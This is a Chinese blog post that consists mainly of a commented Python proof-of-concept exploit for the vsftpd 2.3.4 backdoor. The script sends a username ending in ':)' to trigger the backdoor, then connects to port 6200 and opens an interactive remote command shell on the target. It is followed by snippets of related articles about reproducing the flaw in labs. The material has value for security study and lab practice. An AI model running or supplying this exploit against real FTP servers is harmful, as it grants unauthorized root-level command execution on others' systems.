vsftpd2.3.4 POC代码

最新推荐文章于 2023-02-11 17:04:36 发布
最新推荐文章于 2023-02-11 17:04:36 发布
阅读量212 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wl7979/article/details/113459457
版权 
import socket    #网络编程   urllab2 requests
import time      #时间
import sys       #接受参数    optparser 
'''
调用SOCKET库下的socket功能其(使用IP地址类型,使用传输层的协议,protocal=0)
socket.AF_INET:IPV4
socket.AF_INET6:IPV6
socket.SOCK_STREAM:使用TCP传输协议
socket.SOCK_DGRAM:使用UDP传输协议
协议默认为0填写的就是tcp协议
'''

def exploit(ip, port):
    try:
        ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
        ftp.connect((ip, port))                 #对目标IP地址及端口进行连接
        check = ftp.recv(1024).decode('utf-8')  # 接受返回来的数据并对其进行解码操作
        socket.setdefaulttimeout(5)             #设置请求超时时间
        if "vsftpd 2.3.4" in check.lower():     #检测banner信息中是否存在漏洞信息
            ftp.send(b'USER letmein:)\n')       #发送攻击数据
            ftp.send(b'PASS invaild\n')         #发送攻击数据
            time.sleep(2)                       #等待2秒钟时间
            ftp.close()                         #关闭连接
            print("[+] SUCCESSFUL CONNECTİON")
        else:
            print("[-] Not work vsftpd 2.3.4")
    except Exception as f:                      #异常信息给到变量f
        print('[-] CONNECTION FAILED')
        print(f)                                #打印异常信息
        ftp.close()                             #关闭连接
        sys.exit(1)                             #退出程序并返回1

    try:
        arkakapi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     #调用socket库
        arkakapi.connect((ip, 6200))                                     #对目标IP地址及端口进行连接
        arkakapi.setdefaulttimeout(1.5)                                  #设置请求超时时间为1.5秒
        print('[*] SESSION CREATED')  
        print('[!] Interactive shell to check >> use command shell_check')
        host = str.encode('id -u -n' + '\n')                             #漏洞验证                           
        arkakapi.send(host)
        hostt = arkakapi.recv(1024).decode('utf-8')
        while True:
            sendnude = input(ip + '@' + str(hostt.strip()) + "#: ")      #接受用户输入要执行的命令
            if sendnude.lower() == 'shell_check':
                print('[*]Interactıve shell checked...')
                komut = str.encode((tty + '\n'))
                arkakapi.send(komut)
                print(arkakapi.recv(1024).decode('utf-8'))
            else:
                try:
                    komut = str.encode((sendnude + '\n'))              #将输入的命令添加换行操作在进行UTF-8编码
                    arkakapi.send(komut)                               #发送要执行的命令
                    responseq = arkakapi.recv(1024).decode('utf-8')    #接受并解码放回来的数据
                    print(responseq)                                   #打印命令执行结果
                except socket.timeout:
                    pass

            if sendnude.lower() == 'exit':                             #shell中判断退出
                print('[*] SESSION CLOSED')
                arkakapi.close()
                sys.exit(1)
    except Exception as f:                                             #异常处理
        print('[!] Failed to connect to backdoor')
        print(f)

if __name__ == '__main__':     # 判断python脚本是否是独立执行
    if len(sys.argv) < 3:      # 脚本参数数量判断
        print('Usage ./VSFTPexp.py <İP> <PORT>')
        print('Example ./VSFTPexp.py 127.0.0.1 21')    
    else:
        exploit(sys.argv[1], int(sys.argv[2]))   #函数使用  第一个参数传递进入字符串类型  第二个参数传递进入为类型转换后的整型
wl7979
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
实现笑脸漏洞vsftpd2.3.4
yZGLHH的博客
12-12 2892
留着
vsftpd-2.3.4移植到8621开发板
McArthurUp2U的专栏
09-28 802
客户不知道从哪里买来块板子,让我帮他移植程序。什么gongj
vsftpd 2.3.4
12-15
Linux 源代码 编译安装vsftpd-2.3.4 提供开源安全可靠的ftp服务系统 文件夹内有详细教程与配套文件 Linux 源代码 编译安装vsftpd-2.3.4的配置 Linux下FTP服务器vsftp配置大全超完整版 Linux下vsFTP配置全方案(限制用户端口速度空间)
vsftpd-2.3.4服务器在ok6410开发板上的移植
alan00000的专栏
01-11 6583
老房原创修改版,在房老师教程基础上修改而成。   老房原创,转载声明,熬夜至凌晨2点捣鼓不容易啊! 我的环境飞凌OK6410开发板,arm-linux-gcc 4.3.2(我一般用的开发工具不新不旧) --------------------------------------传-说-中-的-分-割-线--------------------------------------------
vsftp2.3.4安装.rar
03-20
vsftpd2.3.4主要用途就是因为他有一个人尽皆知的漏洞,笑脸漏洞vsftpd2.3.4,本工具里有自动安装脚本,可以方便快捷的执行安装操作,省去了很多间,感兴趣的小伙伴可以进行下载。
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
VSFTPD2.3.4(笑脸漏洞)复现
柠檬i的博客
10-29 1802
vsftpd2.3.4在ftp认证,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
Linux 源代码 编译安装vsftpd-2.3.4
03-19
Linux 源代码 编译安装vsftpd-2.3.4,提供开源安全可靠的ftp服务系统,是你搭载ftp的不二之选
VSFTPD v2.3.4 著名笑脸漏洞
aiwodouai的博客
12-14 2697
VSFTPD v2.3.4 著名笑脸漏洞
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞)
qq_34914659的博客
08-09 3011
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
vsftpd.rar
09-22
vsftpd 是一个 UNIX 类操作系统上运行的服务器的名字,它可以运行在诸如 Linux, BSD, Solaris, HP-UX 以及 IRIX 上面。vsftpd源码,方便交叉编译。
vsftp234--POC.py
04-03
该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。
VsFtpd V2.3.4.zip
07-17
vsftpd是一个快速、安全的FTP服务器,运行于类UNIX系统中。它经常被应用于大流量站点,它包含SSL、IPv6等。
Python制作vsftpd2.3.4的exp和poc
xiaobaihack_doge的博客
02-11 326
Python是一门优秀的脚本语言,目前在网络安全领域被广泛使用,一些exp(漏洞利用程序)程序都是由Python做的,本次我们将用Python写一个exp和poc(漏洞验证程序)。关于vsftpd2.3.4程序,这是一个在Linux上的ftp软件,允许其他设备通过ftp连接,但是这个软件存在一个高危漏洞,当用户名或密码含有:)字样,会在本机开启一个提供shell的6200端口,因此被称为"笑脸漏洞”。exploit-db上的exp。
VSFTPD2.3.4笑脸漏洞复现
weixin_53156886的博客
12-13 3162
笑脸漏洞:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 攻击机:kali Linux 靶机:Metaspolitable2 kali和靶机以NAT模式连接 得到自己的IP :192.168.152.128 nmap扫描主机IP下的端口 扫描到192.168.152.129开放了21等端口 扫描该IP开启的...
CentOS 5.5编译安装vsftpd-2.3.4配置虚拟用户
耕耘——从菜鸟到高手的蜕变
05-12 1409
CentOS 5.5编译安装vsftpd-2.3.4配置虚拟用户   2012-02-22 17:18:15|  分类: rhel_vsftp|举报|字号 订阅 centos 5.5编译安装vsftpd-2.3.4配置虚拟用户 环境:centos 5.5+Vsftpd-2.3.4 一、下载当前vsftp最新版本 wget ftp://v
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4830
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
Vsftpd2.3.4后门利用脚本编写
gugonggugong的博客
01-31 574
一、漏洞介绍 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 二、漏洞复现 Linux源代码安装Vsftpd2.3.4: wgethttp://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz #下载安装包 tarzxvf...
vsftpd2.3.4下载
最新发布
09-29
要下载vsftpd2.3.4,您可以按照以下步骤进行操作: 1. 打开您喜欢的网络浏览器,如Chrome,Firefox等。 2. 在搜索引擎中搜索“vsftpd2.3.4下载”,您将找到一些包含下载信息的网站。 3. 点击其中一个可靠的网站...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值